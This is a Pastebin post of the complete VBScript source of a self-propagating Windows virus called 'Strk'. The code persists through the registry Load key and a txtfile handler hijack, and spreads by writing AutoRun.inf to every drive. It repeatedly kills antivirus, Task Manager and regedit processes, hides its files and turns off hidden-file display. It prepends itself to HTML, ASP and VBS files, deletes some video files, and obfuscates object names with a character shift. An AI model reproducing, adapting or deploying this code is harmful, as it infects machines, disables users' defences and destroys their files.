Advertisement
FlyFar

Strk - VBS Metamorphosis Virus

Mar 6th, 2023
2,256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 16.18 KB | Cybersecurity | 0 0
  1. '$Top_3
  2. On Error Resume Next
  3. Dim Cnt, CntMax, Maxsize, Version, Name_V1, Path_V1,Path_V2
  4. Cnt = 0
  5. CntMax = 300
  6. Maxsize = 150000
  7. Version="3"
  8. Name_V1 = "{HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs"
  9. Path_V1 = GetSFolder(1) & Name_V1
  10. Path_V2 = GetSFolder(0) & Name_V1
  11. Call Main()
  12. Sub Main()
  13.     On Error Resume Next
  14.     If IsVbs() = True Then
  15.         Call ExeVbs()  
  16.     ElseIf IsHtml() = True Then
  17.         Call ExeWebPage()
  18.     End If
  19. End Sub
  20. Sub ExeWebPage()
  21.     On Error Resume Next
  22.     Dim objfso,vbsCode,SFSO
  23.    
  24.     SFSO="Vfulswlqj1IlohV|vwhpRemhfw"
  25.     Set objfso = CreateObject(DeCode(SFSO))
  26.     vbsCode = GetScriptCode("vbscript")
  27.      
  28.     Call DeSafeSet()    
  29.     Call InvadeSystem(objfso,vbsCode)                          
  30.     Set objfso = Nothing
  31. End Sub
  32.  
  33. Sub ExeVbs()
  34.     On Error Resume Next  
  35.     Dim objfso,objshell,FullPath_Self,Name_Self,vbsCode
  36.     Dim ArgNum,Para_V,oArgs,SubPara_V,RunPath
  37.     Dim FullPath_OK,SFSO
  38.  
  39.     FullPath_OK= GetSFolder(0) & "OK.ini"
  40.     SFSO="Vfulswlqj1IlohV|vwhpRemhfw"
  41.     Set objfso = CreateObject(DeCode(SFSO))
  42.     Set objshell = CreateObject("wscript.shell")  
  43.     Call InitializeVBS(objfso, objshell)
  44.      
  45.     Name_Self =WScript.ScriptName        
  46.     FullPath_Self = WScript.ScriptFullName
  47.          
  48.     If Name_Self = Name_V1 Then      
  49.         Set oArgs = WScript.Arguments
  50.         ArgNum = 0
  51.         Do While ArgNum < oArgs.Count
  52.             Para_V = Para_V & " " & oArgs(ArgNum)
  53.             ArgNum = ArgNum + 1
  54.         Loop
  55.      
  56.         SubPara_V = Lcase(Right(Para_V,3))      
  57.             Select Case SubPara_V
  58.             Case  "run"
  59.                          
  60.                 RunPath = left(FullPath_Self,2)
  61.                 Call Run(RunPath)
  62.                
  63.                 vbsCode = GetSelfCode(objfso, FullPath_Self)
  64.                 Call InvadeSystem(objfso,vbsCode)
  65.                 Call Run(Path_V1)                                  
  66.                  
  67.             Case  "txt"
  68.                 RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V  
  69.                 Call Run(RunPath)
  70.                            
  71.                 vbsCode = GetSelfCode(objfso, FullPath_Self)
  72.                 Call InvadeSystem(objfso,vbsCode)
  73.                 Call Run(Path_V1)
  74.                
  75.             Case Else        
  76.                 If PreInstance = True Then
  77.                     WScript.Quit
  78.                 End If
  79.        
  80.                 vbsCode = GetSelfCode(objfso, FullPath_Self)
  81.                 Call InvadeSystem(objfso,vbsCode)                                            
  82.                
  83.                 If  objfso.FileExists(FullPath_OK) = False or IsOK(objfso,Date(), FullPath_OK) =False Then
  84.                      Call DeSafeSet()                                    
  85.                      Call SearchDrives(objfso,vbsCode)
  86.                      Call OK(objfso,Date(), FullPath_OK)                        
  87.                 End If
  88.                  
  89.                 Call Monitor(objfso,vbsCode)            
  90.             End Select                                              
  91.         Else                                                        
  92.             vbsCode = GetSelfCode(objfso, FullPath_Self)      
  93.             Call InvadeSystem(objfso,vbsCode)
  94.             Call Run(Path_V1)
  95.            
  96.     End If
  97.     Set objfso = Nothing
  98.     Set objshell = Nothing
  99. End Sub
  100.  
  101. Sub InitializeVBS(f, Shell)
  102.     On Error Resume Next
  103.     Dim T
  104.     T=Shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
  105.     If (T>=1) Then
  106.         Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
  107.     End if      
  108. End Sub
  109.  
  110. Sub Monitor(objfso,vbsCode)
  111.     On Error Resume Next  
  112.     Dim dc,d
  113.     ProcessNames = Array("ras.exe","360tray.exe","taskmgr.exe","regedit.exe","msconfig.exe","SREng.exe","USBAntiVir.exe")    
  114.     Do  
  115.         Call KillProcess(ProcessNames)    
  116.         Call InvadeSystem(objfso,vbsCode)    
  117.         Set dc = objfso.Drives
  118.         For Each d In dc    
  119.                 Call AutoRun(objfso, d.DriveLetter,vbsCode)        
  120.         Next          
  121.         WScript.sleep 5000
  122.     Loop
  123.    
  124. End Sub
  125.  
  126. Sub AutoRun(objfso, D,vbsCode)
  127.     On Error Resume Next
  128.     Dim path_autorun, path_vbs,inf_autorun
  129.     path_autorun = D & ":\AutoRun.inf"
  130.     path_vbs = D & ":\" & Name_V1  
  131.      
  132.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False or GetVersion(objfso,path_vbs)<Version Then
  133.        
  134.         If objfso.FileExists(path_autorun) = True Then
  135.             objfso.DeleteFile path_autorun, True
  136.         End If
  137.              
  138.         If objfso.FileExists(path_vbs) = True Then
  139.             objfso.DeleteFile path_vbs, True
  140.         End If
  141.        
  142.         Call CopyFile(objfso, vbsCode, path_vbs)
  143.         Call SetFileAttr(objfso, path_vbs)
  144.                  
  145.         inf_autorun = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & vbCrLf & "shell\AutoRun=Sb_(O)" & vbCrLf &  "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & vbCrLf & "shell\AutoRun1=D崘nthV(X)" & vbCrLf &  "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  146.         Call CopyFile(objfso, inf_autorun, path_autorun)
  147.         Call SetFileAttr(objfso, path_autorun)
  148.                
  149.     End If
  150. End Sub
  151.  
  152. Sub InvadeSystem(objfso,vbsCode)
  153.     On Error Resume Next
  154.     Dim Value,dc,d,HCULoad
  155.      
  156.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  157.              
  158.     If objfso.FileExists(Path_V1) = True  Then
  159.         If GetVersion(objfso,Path_V1)<Version Then
  160.             objfso.DeleteFile Path_V1 ,True
  161.         End If    
  162.     End If
  163.     If objfso.FileExists(Path_V1) = False  Then  
  164.         Call CopyFile(objfso, vbsCode, Path_V1)
  165.         Call SetFileAttr(objfso, Path_V1)          
  166.     End If
  167.    
  168.     If ReadReg(HCULoad)<> Path_V1 Then
  169.         Call WriteReg (HCULoad, Path_V1, "")
  170.     End If
  171.    
  172.    
  173.     If objfso.FileExists(Path_V2) = True  Then
  174.         If GetVersion(objfso,Path_V2)<Version Then
  175.             objfso.DeleteFile Path_V2 ,True
  176.         End If    
  177.     End If  
  178.     If objfso.FileExists(Path_V2) = False  Then  
  179.         Call CopyFile(objfso, vbsCode, Path_V2)
  180.         Call SetFileAttr(objfso, Path_V2)          
  181.     End If
  182.                
  183.     Value = "%SystemRoot%\System32\WScript.exe " & """" & Path_V2 & """" & " %1 %* "
  184.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  185.         Call SetTxtFileAss(Path_V2)
  186.     End If
  187.    
  188.     If ReadReg(HCULoad)<> Path_V1 And ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  189.         Set dc = objfso.Drives
  190.         For Each d In dc
  191.                 Call AutoRun(objfso, d.DriveLetter,vbsCode)
  192.         Next    
  193.     End If  
  194. End Sub
  195.  
  196. Sub SearchDrives(objfso,vbsCode)
  197.     On Error Resume Next
  198.     Dim d ,dc
  199.     Set dc = objfso.Drives
  200.     For Each d In dc
  201.         If Cnt >= CntMax Then '
  202.            Exit For
  203.         End If
  204.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  205.                   Call SearchFile(objfso, d.Path & "\",vbsCode)
  206.         End If
  207.     Next
  208. End Sub
  209.  
  210. Sub SearchFile(objfso, strPath,vbsCode)
  211.     On Error Resume Next
  212.     Dim pfo,pf,pfi,ext
  213.     Dim psfo,ps
  214.    
  215.     Set pfo = objfso.GetFolder(strPath)
  216.     Set pf = pfo.Files
  217.     For Each pfi In pf
  218.         If Cnt >= CntMax Then
  219.             Exit For
  220.         End If
  221.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  222.                    
  223.         Select Case ext
  224.             Case "hta","htm","html","asp","vbs":          
  225.                 Call InfectHead(pfi.Path, pfi, objfso, vbsCode, ext)
  226.             Case "mpg", "rmvb", "avi", "rm" :          
  227.             If IsSexFile(pfi.Name) = True Then
  228.                 pfi.Delete
  229.             End If        
  230.         End Select
  231.     Next
  232.     Set psfo = pfo.SubFolders
  233.     For Each ps In psfo
  234.         If Cnt >= CntMax Then
  235.             Exit For
  236.         End If
  237.         Call SearchFile(objfso,ps.Path,vbsCode)
  238.     Next
  239. End Sub
  240.  
  241. Function IsOK(objfso,Now_V,path_f)
  242.     Dim vf
  243.     IsOK = False
  244.     Set vf = objfso.OpenTextFile(path_f,1)  
  245.     If vf.readline ="OK" And InStr(vf.readline ,Now_V) >0 Then
  246.         IsOK = True
  247.     ElseIf InStr(vf.readline, "Admin") >0 Then
  248.         msgbox  "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  249.         IsOK = True
  250.     End If                                
  251. End Function
  252. Sub OK(objfso,Now_V,path_f)
  253.     Dim vf
  254.     Set vf = objfso.OpenTextFile(path_f,2,True)
  255.     vf.write "OK" & vbcrlf
  256.     vf.Writeline Now_V  
  257.     Call SetFileAttr(objfso,path_f)
  258. End Sub
  259.  
  260. Function PreInstance()
  261.     On Error Resume Next
  262.     Dim num_cnt
  263.     Dim strComputer,objWMIService,colProcessList,objProcess
  264.     num_cnt = 0
  265.     PreInstance = False
  266.    
  267.     strComputer = "."
  268.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  269.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  270.     For Each objProcess in colProcessList
  271.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  272.             num_cnt = num_cnt + 1
  273.         End If
  274.     Next
  275.    
  276.     If num_cnt>= 2 Then
  277.         PreInstance = True
  278.     End If
  279. End Function
  280.  
  281. Function IsVbs()
  282.     On Error Resume Next
  283.     Dim TErr
  284.     TErr = WScript.ScriptFullName
  285.     If Err Then
  286.         Err.Clear
  287.         IsVbs = False
  288.     Else
  289.         IsVbs = True
  290.     End If
  291. End Function
  292. Function IsHtml()
  293.     On Error Resume Next
  294.     Dim TErr
  295.     TErr = document.Location
  296.     If Err Then
  297.         Err.Clear
  298.         IsHtml = False
  299.     Else
  300.         IsHtml = True
  301.     End If
  302. End Function
  303. Function GetVersion(objfso,path_v)
  304.     Dim fv,buffer
  305.     Set fv = objfso.OpenTextFile(path_v, 1)
  306.     buffer=fv.ReadALL()
  307.     GetVersion=Mid(buffer,InStr(buffer, "'$Top")+6,1)
  308. End Function
  309.  
  310. Sub SetTxtFileAss(sFilePath)
  311.     On Error Resume Next
  312.     Dim Value
  313.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  314.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  315. End Sub
  316. Function GetSelfCode(objfso, FullPath_Self)
  317.    
  318.     Dim n, n1, buffer, Self
  319.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  320.     buffer = Self.ReadAll
  321.     n = InStr(buffer, "'$Top")
  322.     n1 = InstrRev(buffer, "'$Bottom")
  323.     buffer = Mid(buffer, n, n1 - n + 8)
  324.     GetSelfCode = buffer
  325.     Self.Close
  326. End Function
  327.  
  328. Function IsSexFile(fname)
  329.     IsSexFile = False
  330.     If InStr(fname, "b篘")>0 Or InStr(fname, "雖")>0 Or InStr(fname, "wP蚥")>0 Or _
  331.                 InStr(fname, "wP")>0 Or InStr(fname, "鉙")>0 Or InStr(fname, ":_xY")>0 Or _
  332.                 InStr(fname, "n弜Y")>0 Or InStr(fname, "&OtGr")>0 Or InStr(fname, "陙xd")>0 Then
  333.         IsSexFile = True
  334.     End If
  335. End Function
  336. Function Isinfected(buffer, ftype)
  337.     Isinfected = True
  338.     Select Case ftype
  339.         Case "hta","htm" , "html" , "asp", "vbs":
  340.             If InStr(buffer, "'$Top") = 0 Then
  341.                 Isinfected = False
  342.             End If
  343.         Case Else
  344.             Isinfected = True
  345.     End Select
  346. End Function
  347. Sub InfectHead(strPath, fi, objfso, vbsCode, ftype)
  348.     On Error Resume Next
  349.     Dim tso, buffer,strCode
  350.     If fi.Size< Maxsize Then
  351.         Set tso = objfso.OpenTextFile(strPath, 1, true)
  352.         buffer = tso.ReadAll()
  353.         tso.Close
  354.        
  355.         Select Case ftype
  356.             Case "hta","htm","html","asp":
  357.                 If Isinfected(buffer, ftype) = False Then
  358.                     strCode = MakeScript(vbsCode, 0)
  359.                     Set tso = objfso.OpenTextFile(strPath, 2, true)
  360.                     Cnt = Cnt + 1
  361.                     tso.Write strCode & vbCrLf & buffer
  362.                     tso.Close
  363.                     Set tso = Nothing
  364.                 End If
  365.             Case "vbs":
  366.                 If Isinfected(buffer, ftype) = False Then
  367.                     n = InStr(buffer , "Option Explicit")
  368.                     If n<>0 Then
  369.                         buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  370.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  371.                         tso.Write vbsCode & vbCrLf & buffer
  372.                         Cnt = Cnt + 1
  373.                         tso.Close
  374.                         Set tso = Nothing
  375.                     Else
  376.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  377.                         tso.Write vbsCode & vbCrLf & buffer
  378.                         Cnt = Cnt + 1
  379.                         tso.Close
  380.                         Set tso = Nothing
  381.                     End If
  382.                 End If
  383.             Case Else
  384.         End Select
  385.        
  386.     End If
  387. End Sub
  388.  
  389. Function GetSFolder(p)
  390.     Dim objfso,SFSO
  391.     SFSO="Vfulswlqj1IlohV|vwhpRemhfw"
  392.     Set objfso = CreateObject(DeCode(SFSO))
  393.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  394.     Set objfso = Nothing
  395. End Function
  396. Function MakeScript(strCode, T)
  397.     If T = 1 Then
  398.         MakeScript = EnCode(strCode)
  399.     Else
  400.         MakeScript = "<" & "SCRIPT Language = VBScript>" & vbCrLf & strCode & vbCrLf & "</" & "SCRIPT>"
  401.     End If
  402. End Function
  403. Sub KillProcess(ProcessNames)
  404.     Dim objWMIService,ProcessName,colProcessList,objProcess
  405.      
  406.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=Impersonate}!root\cimv2")
  407.     For Each ProcessName in ProcessNames
  408.         Set colProcessList = objWMIService.execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  409.         For Each objProcess in colProcessList
  410.             objProcess.terminate()
  411.         Next
  412.     Next
  413. End Sub
  414. Sub DeleteReg(strkey)
  415.     Dim tmps
  416.     Set tmps = CreateObject("wscript.shell")
  417.     tmps.RegDelete strkey
  418.     Set tmps = Nothing
  419. End Sub
  420. Function ReadReg(strkey)
  421.     Dim tmps
  422.     Set tmps = CreateObject("wscript.shell")
  423.     ReadReg = tmps.RegRead(strkey)
  424.     Set tmps = Nothing
  425. End Function
  426. Sub WriteReg(strkey, Value, vtype)
  427.     Dim tmps
  428.     Set tmps = CreateObject("wscript.shell")
  429.     If vtype = "" Then
  430.         tmps.RegWrite strkey, Value
  431.     Else
  432.         tmps.RegWrite strkey, Value, vtype
  433.     End If
  434.     Set tmps = Nothing
  435. End Sub
  436. Sub Run(ExeFullName)
  437.     Dim WshShell
  438.     Set WshShell = WScript.CreateObject("wscript.shell")
  439.     WshShell.Run ExeFullName
  440.     Set WshShell = Nothing
  441. End Sub
  442.  
  443. Sub DeSafeSet()
  444.     Dim HLMShow , HCUAdvanced,HCUExplorer
  445.     HLMShow= "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  446.     HCUAdvanced="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  447.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"  
  448.    
  449.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")  
  450.     Call WriteReg (HCUAdvanced,0,"REG_DWORD")  
  451.     Call WriteReg (HLMShow,0,"REG_DWORD")    
  452. End Sub
  453. Sub SetFileAttr(objfso, pathf)
  454.     Dim vf
  455.     Set vf = objfso.GetFile(pathf)
  456.     vf.Attributes = 6
  457. End Sub
  458. Sub CopyFile(objfso, code, pathf)
  459.     On Error Resume Next
  460.     Dim vf
  461.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  462.     vf.Write code
  463. End Sub
  464. Function GetScriptCode(Languages)
  465.     On Error Resume Next
  466.     Dim soj
  467.     For Each soj In document.Scripts
  468.         If LCase(soj.Language) = Languages Then
  469.             Select Case LCase(soj.Language)
  470.                 Case "vbscript"
  471.                     GetScriptCode = soj.Text
  472.                     Exit Function
  473.                 Case "javascript"
  474.                     GetScriptCode = soj.Text
  475.                     Exit Function
  476.             End Select
  477.         End If
  478.     Next
  479. End Function
  480. Function DeCode(Code)
  481. On Error Resume Next
  482. Dim Curchar,i
  483. For i= 1 To Len(Code)
  484.       Curchar=Mid(Code,i,1)
  485.       If Asc(Curchar) = 16 then
  486.              Curchar=chr(8)
  487.       Elseif Asc(Curchar) = 24 then
  488.              Curchar=chr(12)
  489.       Elseif Asc(Curchar) = 32 then
  490.              Curchar=chr(18)
  491.       Else
  492.              Curchar=chr(Asc(Curchar)-3)
  493.       End if
  494. DeCode=Decode & Curchar
  495. Next
  496. End Function
  497. '$Bottom
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement